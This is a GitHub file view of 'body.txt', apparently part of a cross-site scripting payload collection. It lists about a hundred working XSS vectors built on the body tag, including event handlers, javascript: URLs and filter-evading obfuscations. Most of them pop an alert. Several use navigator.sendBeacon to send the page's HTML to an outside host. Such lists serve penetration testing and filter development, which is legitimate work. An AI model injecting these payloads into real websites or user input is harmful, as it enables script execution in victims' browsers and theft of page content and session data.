-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathbody.txt
110 lines (109 loc) · 6.14 KB
/
body.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
<body/onload=<!-->
alert(1)>
<body background=javascript:alert(/xss/)></body>
body{background:url("javascript:alert('xss')")}
body{background:url(JavAs cr ipt:alert(0))}
<body draggable="true" ondrag="alert(1)">test</body>
<body draggable="true" ondragend="alert(1)">test</body>
<body draggable="true" ondragenter="alert(1)">test</body>
<body draggable="true" ondragleave="alert(1)">test</body>
<body draggable="true" ondragstart="alert(1)">test</body>
<body id=x tabindex=1 onactivate=alert(1)></body>
<body id=x tabindex=1 onbeforeactivate=alert(1)></body>
<body id=x tabindex=1 onbeforedeactivate=alert(1)></body><input autofocus>
<body id=x tabindex=1 ondeactivate=alert(1)></body><input id=y autofocus>
<body id=x tabindex=1 onfocus=alert(1)></body>
<body id=x tabindex=1 onfocusin=alert(1)></body>
<body onafterprint=alert(1)>
<body onafterscriptexecute=alert(1)><script>1</script>
<body onbeforecopy="alert(1)" contenteditable>test</body>
<body onbeforecut="alert(1)" contenteditable>test</body>
<body onbeforepaste="alert(1)" contenteditable>test</body>
<body onbeforeprint=alert(1)>
<body onbeforescriptexecute=alert(1)><script>1</script>
<body onbeforeunload=navigator.sendBeacon('//https://ssl.portswigger-labs.net/',document.body.innerHTML)>
<body onblur=alert(1) id=x><iframe id=x>
<body onclick="alert(1)">test</body>
<body oncontextmenu="alert(1)">test</body>
<body oncopy=alert(1) value="XSS" autofocus tabindex=1>test
<body oncut=alert(1) value="XSS" autofocus tabindex=1>test
<body ondblclick="alert(1)" autofocus tabindex=1>test</body>
<body onerror=alert(1) onload=/>
<body onfocusout=alert(1) id=x><iframe id=x>
<body onhashchange="alert(1)">
<body onkeydown="alert(1)" contenteditable>test</body>
<body onkeypress="alert(1)" contenteditable>test</body>
<body onkeyup="alert(1)" contenteditable>test</body>
<body onload=alert(1)>
<body onload=alert(/XSS/.source)>
<body onfocus=alert(1)>
<body onmessage=alert(1)>
<body onmousedown="alert(1)">test</body>
<body onmouseenter="alert(1)">test</body>
<body onmouseleave="alert(1)">test</body>
<body onmousemove="alert(1)">test</body>
<body onmouseout="alert(1)">test</body>
<body onmouseover="alert(1)">test</body>
<body onmouseup="alert(1)">test</body>
<body onmousewheel=alert(1)>requires scrolling
<body onpagehide=navigator.sendBeacon('//https://ssl.portswigger-labs.net/',document.body.innerHTML)>
<body onpageshow=alert(1)>
<body onpaste="alert(1)" contenteditable>test</body>
<body onpointerdown=alert(1)>XSS</body>
<body onpointerenter=alert(1)>XSS</body>
<body onpointerleave=alert(1)>XSS</body>
<body onpointermove=alert(1)>XSS</body>
<body onpointerout=alert(1)>XSS</body>
<body onpointerover=alert(1)>XSS</body>
<body onpointerrawupdate=alert(1)>XSS</body>
<body onpointerup=alert(1)>XSS</body>
<body onpopstate=alert(1)>
<body onresize="alert(1)">
<body onscroll=alert(1)><div style=height:1000px></div><div id=x></div>
<body onselectionchange=alert(1)>select some text
<body onselectstart=alert(1)>select some text
<body ontouchend=alert(1)>
<body ontouchmove=alert(1)>
<body ontouchstart=alert(1)>
<body onunhandledrejection=alert(1)><script>fetch('//xyz')</script>
<body onunload=navigator.sendBeacon('//https://ssl.portswigger-labs.net/',document.body.innerHTML)>
<body onwheel=alert(1)>
<body background="javascript:alert(1)">
<body onbeforeunload=navigator.sendBeacon('//https://ssl.portswigger-labs.net/',document.body.innerHTML)>
<body background="//evil?
<body onorientationchange=alert(1)>
<body onhashchange=alert(1)><a href=#x>click this!#x
<body style=overflow:auto;height:1000px onscroll=alert(1) id=x>#x
<body onscroll=alert(1)><br><br><br><br>
<body onresize=alert(1)>press F12!
<body onhelp=alert(1)>press F1! (MSIE)
<body src=1 href=1 onerror="javascript:alert(1)"></body>
<body onMouseEnter body onMouseEnter="javascript:javascript:alert(1)"></body onMouseEnter>
<body onFocus body onFocus="javascript:javascript:alert(1)"></body onFocus>
<body onPropertyChange body onPropertyChange="javascript:javascript:alert(1)"></body onPropertyChange>
<body onPageHide body onPageHide="javascript:javascript:alert(1)"></body onPageHide>
<body onMouseOver body onMouseOver="javascript:javascript:alert(1)"></body onMouseOver>
<body onUnload body onUnload="javascript:javascript:alert(1)"></body onUnload>
<body onLoad body onLoad="javascript:javascript:alert(1)"></body onLoad>
<body onPageShow body onPageShow="javascript:javascript:alert(1)"></body onPageShow>
<body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(1)"></body onBeforeUnload>
<body onMouseMove body onMouseMove="javascript:javascript:alert(1)"></body onMouseMove>
<body onResize body onResize="javascript:javascript:alert(1)"></body onResize>
<body onPopState body onPopState="javascript:javascript:alert(1)"></body onPopState>
<body onpagehide body onpagehide="javascript:javascript:alert(1)"></body onpagehide>
<body onkeyup body onkeyup="javascript:javascript:alert(1)"></body onkeyup>
<body onunload body onunload="javascript:javascript:alert(1)"></body onunload>
<body onload body onload="javascript:javascript:alert(1)"></body onload>
<body onbeforeunload body onbeforeunload="javascript:javascript:alert(1)"></body onbeforeunload>
<body onfocus body onfocus="javascript:javascript:alert(1)"></body onfocus>
<body onkeydown body onkeydown="javascript:javascript:alert(1)"></body onkeydown>
<body onblur body onblur="javascript:javascript:alert(1)"></body onblur>
<body onscroll=javascript:alert(1)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
<body oninput=javascript:alert(1)><input autofocus>
<BODY ONLOAD=javascript:alert(1)>
<BODY ONLOAD=javascript:javascript:alert(1)>
<BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(1)>
<body onscroll=javascript:alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
<BODY BACKGROUND="javascript:alert('XSS')">
<BODY ONLOAD=alert('XSS')>
<body/onload=<!-->
alert(1)>